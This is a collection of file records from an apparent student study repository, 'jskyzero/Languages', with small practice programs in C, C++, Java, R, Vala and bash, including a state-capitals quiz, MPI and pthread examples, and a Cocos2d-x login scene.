{\"California\", \"Sacramento\"},\n {\"Colorado\", \"Denver\"},\n {\"Connecticut\", \"Hartford\"},\n {\"Delaware\", \"Dover\"},\n {\"Florida\", \"Tallahassee\"},\n {\"Georgia\", \"Atlanta\"},\n {\"Hawaii\", \"Honolulu\"},\n {\"Idaho\", \"Boise\"},\n {\"Illinois\", \"Springfield\"},\n {\"Maryland\", \"Annapolis\"},\n {\"Minnesota\", \"Saint Paul\"},\n {\"Iowa\", \"Des Moines\"},\n {\"Maine\", \"Augusta\"},\n {\"Kentucky\", \"Frankfort\"},\n {\"Indiana\", \"Indianapolis\"},\n {\"Kansas\", \"Topeka\"},\n {\"Louisiana\", \"Baton Rouge\"},\n {\"Oregon\", \"Salem\"},\n {\"Oklahoma\", \"Oklahoma City\"},\n {\"Ohio\", \"Columbus\"},\n {\"North Dakota\", \"Bismark\"},\n {\"New York\", \"Albany\"},\n {\"New Mexico\", \"Santa Fe\"},\n {\"New Jersey\", \"Trenton\"},\n {\"New Hampshire\", \"Concord\"},\n {\"Nevada\", \"Carson City\"},\n {\"Nebraska\", \"Lincoln\"},\n {\"Montana\", \"Helena\"},\n {\"Missouri\", \"Jefferson City\"},\n {\"Mississippi\", \"Jackson\"},\n {\"Massachusettes\", \"Boston\"},\n {\"Michigan\", \"Lansing\"},\n {\"Pennslyvania\", \"Harrisburg\"},\n {\"Rhode Island\", \"Providence\"},\n {\"South Carolina\", \"Columbia\"},\n {\"South Dakota\", \"Pierre\"},\n {\"Tennessee\", \"Nashville\"},\n {\"Texas\", \"Austin\"},\n {\"Utah\", \"Salt Lake City\"},\n {\"Vermont\", \"Montpelier\"},\n {\"Virginia\", \"Richmond\"},\n {\"Washington\", \"Olympia\"},\n {\"West Virginia\", \"Charleston\"},\n {\"Wisconsin\", \"Madison\"},\n {\"Wyoming\", \"Cheyenne\"}};\n int n = 0;\n int N = 0;\n scanf(\"%d\", &n);\n for (int i = 0; i < n; i++) {\n scanf(\"%s\", s0);\n scanf(\"%s\", c0);\n for (int j = 1; j < 49; j++) {\n if (0 == strcmp(s0, a[j][0])) {\n N = j;\n break;\n }\n }\n if (0 == strcmp(c0, a[N][1]))\n printf(\"Your anwswer is correct\\n\");\n else\n printf(\"The capital of %s is %s\\n\", a[N][0], a[N][1]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5736433863639832, "alphanum_fraction": 0.604651153087616, "avg_line_length": 12, "blob_id": 
"734db0588112979b7ee269ff5d104fba03c1091b", "content_id": "6f14e43d013b4f5f48c4fd4f770563fe7dcb9e35", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 129, "license_type": "permissive", "max_line_length": 40, "num_lines": 10, "path": "/vala/makefile", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "CC = valac\nFlags = --pkg gtk+-3.0 --pkg gmodule-2.0\n\ninstall: timer\n\ntimer: timer.vala\n\t$(CC) $(Flags) $^ -o $@\n\nclean:\n\trm timer" }, { "alpha_fraction": 0.6977152824401855, "alphanum_fraction": 0.6988869309425354, "avg_line_length": 49.787879943847656, "blob_id": "09c8efcd6bcb424d81f3723eefb8933dfdc76997", "content_id": "869c3c209c62d0ec21927e9a7545bdb7bdaf8ee4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1812, "license_type": "permissive", "max_line_length": 599, "num_lines": 33, "path": "/c/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C-Study\r\n> C (/siː/, as in the letter c) is a general-purpose, imperative computer programming language, supporting structured programming, lexical variable scope and recursion, while a static type system prevents many unintended operations. By design, C provides constructs that map efficiently to typical machine instructions, and therefore it has found lasting use in applications that had formerly been coded in assembly language, including operating systems, as well as various application software for computers ranging from supercomputers to embedded systems. (from wikipedia:C (programming language))\r\n\r\n![C_(programming_language)](./docs/The_C_Programming_Language_logo.svg.png)\r\n\r\n\r\n## Overview\r\n\r\n[Why learn C?](https://en.wikibooks.org/wiki/C_Programming/Why_learn_C%3F)\r\n+ C is the most commonly used programming language for writing operating systems. 
\r\n+ C will enable you to understand and appreciate an entire family of programming languages built upon the traditions of C. \r\n+ Knowledge of C enables freedom.\r\n\r\n## Structure\r\n```\r\n├── docs // documents\r\n├── hardwork\r\n│   ├── hardway // practice code\r\n│   ├── helloworld // first program\r\n│   ├── library // library usage example\r\n│   └── tips // some syntax tips\r\n├── projects\r\n│   ├── MPI // Message Passing Interface (MPI) in C\r\n│   ├── POSIX // The Portable Operating System Interface Library study\r\n│   ├── sniff // A mini package sniff program\r\n│   └── socket // TCP/UDP socket simple usage examples\r\n└── README.md\r\n```\r\n\r\n## Reference\r\n\r\n+ [C reference](http://en.cppreference.com/w/c)\r\n+ [C Language Features](http://www.c4learn.com/c-programming/c-features/)" }, { "alpha_fraction": 0.5042194128036499, "alphanum_fraction": 0.5042194128036499, "avg_line_length": 16.55555534362793, "blob_id": "a546b3e8030c7de313f427a02445e4843a163e47", "content_id": "17c5880546199f3c20afb6c102906e1dcea91154", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 474, "license_type": "permissive", "max_line_length": 44, "num_lines": 27, "path": "/c/hardwork/hardway/struct_node_to_list.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <stdlib.h> // for malloc()\n\nstruct list {\n int num;\n struct list *next;\n};\ntypedef struct list list;\n\nint main() {\n int x;\n list *L, *p;\n L = (list *)malloc(sizeof(list));\n L->next = NULL;\n while (scanf(\"%d\", &x) != EOF) {\n p = (list *)malloc(sizeof(list));\n p->num = x;\n p->next = L->next;\n L->next = p;\n }\n \n p = L->next;\n while (p != NULL) {\n printf(\"%d\\n\", p->num);\n p = p->next;\n }\n}\n" }, { "alpha_fraction": 0.5634328126907349, "alphanum_fraction": 0.5634328126907349, "avg_line_length": 18.14285659790039, "blob_id": 
"fec0dc188282ba7f56f902cc3a7e53c86e72ef02", "content_id": "136f1e6f89e2b81f861f9874f875c824a567092a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 268, "license_type": "permissive", "max_line_length": 48, "num_lines": 14, "path": "/R/harwork/hardway/structure.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# structure\nflag <- TRUE\n\n# check whether there is flag in ls()\nhave_flag <- deparse(substitute(flag)) %in% ls()\n\nif (exists(deparse(substitute(flag)))) {\n print(\"find flag\")\n} else {\n for ( obj in ls() ) {\n cat(\"---\", obj, \"---\\n\")\n print(get(obj))\n }\n}\n" }, { "alpha_fraction": 0.6747427582740784, "alphanum_fraction": 0.6853634119033813, "avg_line_length": 27.158878326416016, "blob_id": "983dc1710e2e19bb8f8a2de13b86fbe7d48c8a5c", "content_id": "02fdbb6c050823738a25009323eac1da95264392", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3055, "license_type": "permissive", "max_line_length": 121, "num_lines": 107, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/LoginScene.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "GB18030", "text": "#pragma execution_character_set(\"UTF-8\")\n#include \"LoginScene.h\"\n#include \"cocostudio/CocoStudio.h\"\n#include \"json/rapidjson.h\"\n#include \"json/document.h\"\n#include \"json/writer.h\"\n#include \"json/stringbuffer.h\"\n#include \"Global.h\"\n#include \"GameScene.h\"\n#include <regex>\nusing std::to_string;\nusing std::regex;\nusing std::match_results;\nusing std::regex_match;\nusing std::cmatch;\nusing namespace rapidjson;\nUSING_NS_CC;\n\nusing namespace cocostudio::timeline;\n\n#include \"json/document.h\"\n#include \"json/writer.h\"\n#include \"json/stringbuffer.h\"\nusing namespace rapidjson;\n\nScene* LoginScene::createScene()\n{\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 
'layer' is an autorelease object\n\tauto layer = LoginScene::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool LoginScene::init()\n{\n\t// 1. super init first\n\tif (!Layer::init())\n\t{\n\t\treturn false;\n\t}\n\n\tSize size = Director::getInstance()->getVisibleSize();\n\tvisibleHeight = size.height;\n\tvisibleWidth = size.width;\n\n\t// default user name, use to know can button be clicked\n\tconst string defaultUserName = \"Player Name\";\n\ttextField = TextField::create(defaultUserName, \"Arial\", 30);\n\ttextField->setPosition(Size(visibleWidth / 2, visibleHeight / 4 * 3));\n\tthis->addChild(textField, 2);\n\n\tauto button = Button::create();\n\tbutton->setTitleText(\"Login\");\n\tbutton->setTitleFontSize(30);\n\tbutton->setPosition(Size(visibleWidth / 2, visibleHeight / 2));\n\n\tbutton->addClickEventListener([&](Ref * sender) {\n\t\tauto userName = textField->getStringValue();\n\t\tif (!userName.empty())\n\t\t{\n\t\t\tauto request = new HttpRequest();\n\t\t\tauto postData = \"username=\" + userName;\n\n\t\t\trequest->setUrl(\"http://localhost:8080/login\");\n\t\t\trequest->setRequestType(HttpRequest::Type::POST);\n\t\t\trequest->setRequestData(postData.c_str(), strlen(postData.c_str()));\n\t\t\trequest->setResponseCallback([&](HttpClient *sender, HttpResponse * response) {\n\t\t\t\tif (!response) return;\n\t\t\t\tif (!response->isSucceed()) {\n\t\t\t\t\ttextField->setText(\"(っ °Д °;)っ:是不是服务器没开\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\trapidjson::Document document;\n\t\t\t\tdocument.Parse<0>(Global::vectorChar2String(response->getResponseData()).c_str());\n\t\t\t\tif (document.HasParseError()) {\n\t\t\t\t\ttextField->setText(\"(っ °Д °;)っ:后台君在玩蛇\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tif (document.IsObject() && document.HasMember(\"result\")) {\n\t\t\t\t\tif (document[\"result\"].GetBool()) {\n\t\t\t\t\t\tGlobal::gameSessionId = 
Global::getSessionIdFromHeader(Global::vectorChar2String(response->getResponseHeader()));\n\t\t\t\t\t\t// go to game sence\n\t\t\t\t\t\tDirector::getInstance()->replaceScene(TransitionFade::create(1, GameScene::createScene(), Color3B(255, 255, 255)));\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\t\ttextField->setText(document[\"info\"].GetString());\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t});\n\t\t\tcocos2d::network::HttpClient::getInstance()->send(request);\n\t\t\trequest->release();\n\t\t}\n\t});\n\tthis->addChild(button, 2);\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.4955752193927765, "alphanum_fraction": 0.5132743120193481, "avg_line_length": 13.125, "blob_id": "5b605088e5ef99e7823e6144d9bb4609c28070ce", "content_id": "8601e791954f4b602480f596e59b64e7c5a0d995", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 113, "license_type": "permissive", "max_line_length": 26, "num_lines": 8, "path": "/c/hardwork/hardway/define.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n#define foo(m, n) (m)* (n)\n\nint main() {\n printf(\"in main\\n\");\n printf(\"%d\", foo(1, 2));\n}\n" }, { "alpha_fraction": 0.5973352789878845, "alphanum_fraction": 0.6113989353179932, "avg_line_length": 21.53333282470703, "blob_id": "b135a486e6b2284d51095c72c9067758344a6e9e", "content_id": "a7e3caaa86272f9cdd5454ee8a179e5c5a2f9238", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1351, "license_type": "permissive", "max_line_length": 68, "num_lines": 60, "path": "/c/projects/POSIX/Lab2/2.1.fibonacci.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <stdlib.h> // for atoi()\n#include <string.h> // for memset()\n#include <assert.h> // for assert()\n#include <pthread.h> // for pthread_*\n\n// int cal_size.py we 
can konw 50 is enough for 4byte signed integer\n#define ARRAY_SIZE 47\n\n// argument struct type\nstruct FIB_ARGU {\n int size;\n int array[ARRAY_SIZE];\n};\n\ntypedef struct FIB_ARGU FIB_ARGU_TYPE; \n\nvoid *calcute(void*);\n\n// main func\nint main(int argv, char *args[]) {\n // run with only one num \n if (argv != 2)\n printf(\"Usage: fibonacci size\\n\");\n\n // initial argument\n FIB_ARGU_TYPE argu;\n argu.size = atoi(args[1]);\n assert(argu.size >= 0);\n assert(argu.size < ARRAY_SIZE);\n assert(sizeof(argu.array) == sizeof(int) * ARRAY_SIZE);\n memset(argu.array, 0, sizeof(argu.array));\n argu.array[0] = 0;\n argu.array[1] = 1;\n\n // calcute \n pthread_t thread;\n pthread_attr_t attr;\n pthread_attr_init(&attr);\n assert( 0 == pthread_create(&thread, &attr, calcute, &argu));\n pthread_join(thread, NULL);\n\n // print ans\n for (int i = 0; i <= argu.size; i++) {\n printf(\"%d \", argu.array[i]);\n }\n puts(\"\");\n return 0;\n}\n\nvoid *calcute(void* argv) {\n\n FIB_ARGU_TYPE * data_p = (FIB_ARGU_TYPE *)argv;\n\n for (int i = 2; i <= data_p->size; i++) {\n data_p->array[i] = data_p->array[i-1] + data_p->array[i-2];\n }\n\n return NULL;\n}" }, { "alpha_fraction": 0.49699053168296814, "alphanum_fraction": 0.5038692951202393, "avg_line_length": 22.280000686645508, "blob_id": "1e9e02bec6f8c79a4bc9e3812e17490ef9833c21", "content_id": "d656ced200df937adb47363d864bbd3189e82e6a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1485, "license_type": "permissive", "max_line_length": 71, "num_lines": 50, "path": "/java/hardwork/tips/useStream.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Arrays; // for Arrays\nimport java.util.Random;\nimport java.util.Collection;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\n/**\n * useStream\n * \n * Stream 使用一种类似用 SQL 语句从数据库查询数据的直观方式来提供一种对 Java 集合运算\n * 和表达的高阶抽象。\n * \n */\n\n// +--------------------+ 
+------+ +------+ +---+ +-------+\n// | stream of elements +-----> |filter+-> |sorted+-> |map+-> |collect|\n// +--------------------+ +------+ +------+ +---+ +-------+\n\n// 生成流 \n// 流的来源。 可以是集合,数组,I/O channel, 产生器generator 等。\n// \n// stream() − 为集合创建串行流。\n// stream() − 为集合创建串行流。\n\n\n// 聚合操作\n// \n// forEach 迭代流中的每个数据\n// map 映射每个元素到对应的结果\n// filter 通过设置的条件过滤出元素\n// limit 获取指定数量的流\n// sorted 对流进行排序\n\n// Collectors\n// \n// Collectors 类实现了很多归约操作,例如将流转换成集合和聚合元素。\n\n\npublic class useStream {\n public static void main(String [] args) {\n (new Random()).ints()\n .limit(100)\n .filter(x -> x > 0 && x % 2 == 0)\n .map(x -> x % 10)\n .mapToObj(Integer::new).collect(Collectors.toList())\n .parallelStream()\n .sorted()\n .forEach(x -> System.out.println((int)x));\n }\n}" }, { "alpha_fraction": 0.309230774641037, "alphanum_fraction": 0.36769232153892517, "avg_line_length": 23.074073791503906, "blob_id": "a2ab72dc9cdf189f16a6e687b3d73d98e2b05501", "content_id": "a4e85b7933ecb7d6bca01f0505c00a2b7321a892", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 650, "license_type": "permissive", "max_line_length": 46, "num_lines": 27, "path": "/c/hardwork/hardway/marks_and_ranks.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nfloat a[105];\nint b[6];\nint main() {\n int n;\n scanf(\"%d\", &n);\n double temp = 0;\n int min = 0;\n int max = 0;\n for (int i = 0; i < n; i++) {\n scanf(\"%f\", &a[i]);\n temp += a[i];\n if (a[i] > a[max]) max = i;\n if (a[i] < a[min]) min = i;\n if ((a[i] >= 0) && (a[i] < 60)) b[1]++;\n if ((a[i] >= 60) && (a[i] < 75)) b[2]++;\n if ((a[i] >= 75) && (a[i] < 85)) b[3]++;\n if ((a[i] >= 85) && (a[i] < 95)) b[4]++;\n if ((a[i] >= 95) && (a[i] <= 100)) b[5]++;\n }\n temp = (temp - a[max] - a[min]) / (n - 2);\n printf(\"%.2lf\\n\", temp);\n for (int i = 1; i <= 5; i++) {\n printf(\"%d\\n\", b[i]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 
0.5135593414306641, "alphanum_fraction": 0.5203390121459961, "avg_line_length": 21.653846740722656, "blob_id": "d6be114e45428727e2997b4c7a19b719f9b7fb3d", "content_id": "45bd97681795fb153a35b2968329a54df42472fb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 590, "license_type": "permissive", "max_line_length": 58, "num_lines": 26, "path": "/bash/example/count_code_line.sh", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# all file ext type\nfile_types=\"sh c h cpp cs md hs java py pl PS1 R rkt vala\"\n# ralative path\nrelative_path=\"../../\"\n# save all numbers\ntotal_num=0\n\n\n# travel all type in types\nfor type in $file_types\ndo\n # regex_str=$(printf \".*\\.*\\.\\(%s\\)$\" $type)\n regex_str=\".*\\.*\\.\\($type\\)$\"\n num_str=$(find $relative_path | \\\n grep -p $regex_str | \\\n awk '!/venv/' | \\\n xargs -I {1} cat {1} | \\\n wc -l)\n echo $type \"\\t\" $num_str\n num=$(echo $num_str | \\\n sed 's/ //g')\n total_num=$((total_num+num))\ndone\n\necho ---\necho total \"\\t\" $total_num\n\n" }, { "alpha_fraction": 0.8228782415390015, "alphanum_fraction": 0.8450184464454651, "avg_line_length": 29.22222137451172, "blob_id": "4327bbdf70c813d5137cce121bbaa79afeb4c110", "content_id": "c2e1a8d06b2f8c9a51b48e6b6596ae80f4bf804a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 271, "license_type": "permissive", "max_line_length": 42, "num_lines": 9, "path": "/java/projects/gridworld/sonar-project.properties", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "sonar.projectKey=Part4\nsonar.projectName=Part4\nsonar.projectVersion=1.0\nsonar.sourceEncoding=UTF-8\nsonar.modules=java-module\njava-module.sonar.projectName=Java Mudule \njava-module.sonar.language=java \njava-module.sonar.sources=.\njava-module.sonar.projectBaseDir=Part4_sub" }, { "alpha_fraction": 0.40595611929893494, "alphanum_fraction": 
0.46865203976631165, "avg_line_length": 17.22857093811035, "blob_id": "897d3c4a9f5a1979542c09995548355ba87d75f0", "content_id": "d61d175bdee01b40cbd9b504d95fd5aa66fdb92c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 638, "license_type": "permissive", "max_line_length": 58, "num_lines": 35, "path": "/c/hardwork/hardway/prefix.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <string.h>\n\nchar a[10005];\nchar* p;\nchar* prefix(const char* const s1, const char* const s2) {\n for (int i = 0; i < 10005; i++) {\n a[i] = 0;\n }\n int n1 = strlen(s1);\n int n2 = strlen(s2);\n int n3 = n2 < n1 ? n2 : n1;\n int n4 = 0;\n for (int i = 0; i < n3; i++) {\n n4 = i;\n if (s1[i] == s2[i])\n a[i] = s1[i];\n else\n break;\n }\n if (0 == n4)\n return a;\n else\n return a;\n}\nint main() {\n char s1[] = \"distance\";\n char s2[] = \"tlike\";\n char* p = prefix(s1, s2);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n return 0;\n}\n" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.48571428656578064, "avg_line_length": 8.454545021057129, "blob_id": "5d757649066c272d60c718ed14bdcdb70d2aabee", "content_id": "2c6cbc043161d3c2ddde16953f9a06c557e9db06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 105, "license_type": "permissive", "max_line_length": 17, "num_lines": 11, "path": "/c/hardwork/hardway/main_func.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include<stdio.h>\nint i;\nint main() {\n\twhile(i<=5){\n\t\tprintf(\"A\\n\");\n\t\ti++;\n\t\tmain();\n\t}\n\t\n\treturn 0;\n} \n" }, { "alpha_fraction": 0.5607344508171082, "alphanum_fraction": 0.5790960192680359, "avg_line_length": 21.15625, "blob_id": "dc37443b544c26b938e2b4482d34eee90928e847", "content_id": "3a0bc4a2c0178414aba443b9b3ef827fd7873c7b", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 774, "license_type": "permissive", "max_line_length": 93, "num_lines": 32, "path": "/c/projects/MPI/hardway/MPI_boardcast.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 一个进程的数据被发送到通信子中的所有进程,这样的集合通信叫做广播。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n int source = 0;\n int array[5] = {0, 0, 0, 0, 0};\n int i;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n if (myid == source) {\n for (i = 1; i <= 5; i++) array[i] = i;\n }\n\n // int MPI_Bcast(void* buffer, int count, MPI_Datatype datatype, int source, MPI_Comm comm)\n MPI_Bcast(array, 5, MPI_INT, source, MPI_COMM_WORLD);\n\n if (myid != source) {\n printf(\"In process %d, \", myid);\n for (i = 0; i < 5; i++) printf(\"arr[%d]=%d\\t\", i, array[i]);\n printf(\"\\n\");\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5611775517463684, "alphanum_fraction": 0.5942962169647217, "avg_line_length": 24.302326202392578, "blob_id": "54cf03c85b360375afe905b9f6b787a486ca4043", "content_id": "2585631dee08b9fe07e980b79f18704e2da31895", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1179, "license_type": "permissive", "max_line_length": 82, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_group_ranks.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 如果知道了在组MPI_COMM_WORLD中某些进程的编号,\n// 如何根据这些编号来操作在不同组的同一进程来完成不同的任务呢?\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world, group1, group2;\n int i;\n int ranks1[10];\n int ranks2[10];\n int ranks_output[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, 
&group_world);\n\n for (i = 0; i < numprocs - 1; i++) {\n ranks1[i] = i;\n ranks2[i] = i + 1;\n }\n\n MPI_Group_incl(group_world, numprocs - 1, ranks1, &group1);\n MPI_Group_incl(group_world, numprocs - 1, ranks2, &group2);\n\n // int MPI_Group_translate_ranks(MPI_Group group1, int count, int *ranks1, \n // MPI_Group group2, int *ranks2)\n MPI_Group_translate_ranks(group1, numprocs - 1, ranks1,\n group2, ranks_output);\n\n if (myid == 0) {\n for (i = 0; i < numprocs - 1; i++) {\n printf(\"The group1 rank %d in group2 is: %d\\n\", ranks1[i], ranks_output[i]);\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5068672299385071, "alphanum_fraction": 0.5094833374023438, "avg_line_length": 19.66216278076172, "blob_id": "7dbc06388a42191e3c382e891853d79fa4a19659", "content_id": "9a97070a3ffcfa1423aa15a8c0787dd3c2a5c18e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1529, "license_type": "permissive", "max_line_length": 79, "num_lines": 74, "path": "/java/projects/gridworld/Part2/DancingBug/src/DancingBug.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import info.gridworld.actor.Bug;\n\n/**\n * A <code>DancingBug</code> traces out a square \"box\" of a given size. 
<br />\n * The implementation of this class is testable on the AP CS A and AB exams.\n */\npublic class DancingBug extends Bug\n{\n private int steps;\n private int[] sideTurnTimesArray;\n private boolean needTurn;\n private int trunTimes;\n\n /**\n * Constructs a box bug that traces a square of a given side turnTimesArray\n * @param turnTimesArray the side turnTimesArray\n */\n public DancingBug(int []turnTimesArray)\n {\n steps = 0;\n needTurn = true;\n trunTimes = 0;\n\n if (turnTimesArray == null) \n {\n sideTurnTimesArray = new int[0];\n } else \n {\n sideTurnTimesArray = turnTimesArray.clone();\n }\n\n }\n\n /**\n * do the next action \n */\n public void act()\n {\n if (needTurn)\n {\n turnToDirectiom();\n } else {\n runLine();\n }\n }\n\n /**\n * turn Direction and check if is finished \n */\n public void turnToDirectiom()\n {\n if ( trunTimes == sideTurnTimesArray[steps%sideTurnTimesArray.length] )\n {\n needTurn = false;\n trunTimes = 0;\n } else {\n turn();\n trunTimes++;\n }\n }\n\n /**\n * move at one line\n */\n public void runLine()\n {\n if (canMove())\n {\n move();\n steps++;\n needTurn = true;\n }\n }\n}\n" }, { "alpha_fraction": 0.5798354148864746, "alphanum_fraction": 0.6074073910713196, "avg_line_length": 20.900901794433594, "blob_id": "8b7c9512d4198b4f220733a525185dac135e2fbc", "content_id": "c6ac40aa5995e5103181c6b37815e52e78d2c1b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2430, "license_type": "permissive", "max_line_length": 88, "num_lines": 111, "path": "/java/projects/gridworld/Ex1_Sub/NewImageIO.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// this is ImageIO file that implements IImageIO\n// just use binary file read method wrote by ourselves\n// sava to file is said to be use Java's API (smile face)\n\n\n// this time in fact we just use IImageIO\nimport imagereader.*;\n// \nimport java.awt.image.*;\n// for Image\nimport 
java.awt.*;\nimport java.io.*;\nimport javax.imageio.*;\n\npublic class NewImageIO implements IImageIO \n{\n\t// head and info total size\n\tpublic static final int READ_SIZE = 54;\n\n\t// implements READ\n\tpublic Image myRead(String filePath)\n\t{\n\t\tImage image;\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tFileInputStream in = new FileInputStream(filePath);\n\n\t\t\tbyte bytes[] = new byte[READ_SIZE];\n\t\t\t\n\t\t\tin.read(bytes, 0, READ_SIZE);\n\n\t\t\tint width = myByte2Int(bytes, 18, 22);\n\t\t\tint height = myByte2Int(bytes, 22, 26);\n\t\t\tint size = myByte2Int(bytes, 34, 38);\n\n\t\t\tint spaceSize = (size / height) - width * 3;\n\t\t\tspaceSize = spaceSize == 4 ? 0 : spaceSize;\n\n\t\t\tint data[] = new int[width * height];\n\t\t\tbyte buffer[] = new byte[size];\n\t\t\tin.read(buffer, 0, size);\n\n\t\t\tint index = 0;\n\t\t\tfor (int i = 0; i < height; i++)\n\t\t\t{\n\t\t\t\tfor (int j = 0; j < width; j++)\n\t\t\t\t{\n\t\t\t\t\tdata[width * (height - i - 1) + j] = \n\t\t\t\t\t(255 & 0xff) << 24\n\t\t\t\t\t| (((int)buffer[index + 2] & 0xff) << 16)\n\t\t\t\t\t| (((int)buffer[index + 1] & 0xff) << 8)\n\t\t\t\t\t| (((int)buffer[index + 0] & 0xff) << 0);\n\n\t\t\t\t\tindex += 3;\n\t\t\t\t}\n\t\t\t\tindex += spaceSize;\n\t\t\t}\n\n\n\t\t\timage = Toolkit.getDefaultToolkit().createImage(\n\t\t\t\tnew MemoryImageSource(\n\t\t\t\t\twidth, height, data, 0, width));\n\n\t\t\tin.close();\n\t\t\treturn image;\n\t\t}\n\t\tcatch (Exception e)\n\t\t{\n\t\t\tSystem.out.println(\"error\");\n\t\t}\n\t\treturn (Image)null;\n\n\t}\n\n\t// implements WRITE\n\tpublic Image myWrite(Image image, String filePath)\n\t{\n\t\ttry\n\t\t{\n\t\t\tFile imageFile = new File(filePath + \".bmp\");\n\t\t\tBufferedImage buffer = new BufferedImage(image.getWidth(null), image.getHeight(null),\n\t\t\t\tBufferedImage.TYPE_INT_RGB);\n\t\t\tGraphics2D g2 = buffer.createGraphics();\n\t\t\tg2.drawImage(image, 0, 0, null);\n\t\t\tg2.dispose();\n\t\t\t\n\t\t\tImageIO.write(buffer, \"bmp\", 
imageFile);\n\t\t}\n\t\tcatch(Exception e)\n\t\t{\n\t\t\tSystem.out.println(\"error\");\n\t\t}\n\t\treturn image;\n\t}\n\n\n\t// we need a method that eaily trans bytes to int \n\tpublic int myByte2Int(byte bytes[], int begin, int end) \n\t{\n\t\t// we store LSB in higher index\n\t\tint ans = 0;\n\t\t// E.G byte[] = {1, 2, 3, 4} ans = 0x04030201\n\t\tfor (int i = begin; i < end; i++)\n\t\t{\n\t\t\tans += (int)(bytes[i] & 0xff) << (8 * (i - begin));\n\t\t}\n\n\t\treturn ans;\n\t}\n}" }, { "alpha_fraction": 0.5921696424484253, "alphanum_fraction": 0.6052201986312866, "avg_line_length": 20.89285659790039, "blob_id": "19bae5c43cc25f34d99f2bf9f92e5204fc841dfa", "content_id": "cf59a5553a062b21035f7392de24ab456d591876", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 677, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/R/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# R-Study\n`jskyzero` `2017/09/03`\n\n## Overview\n+ R is a free software environment for statistical computing and graphics.\n+ ...\n\n## 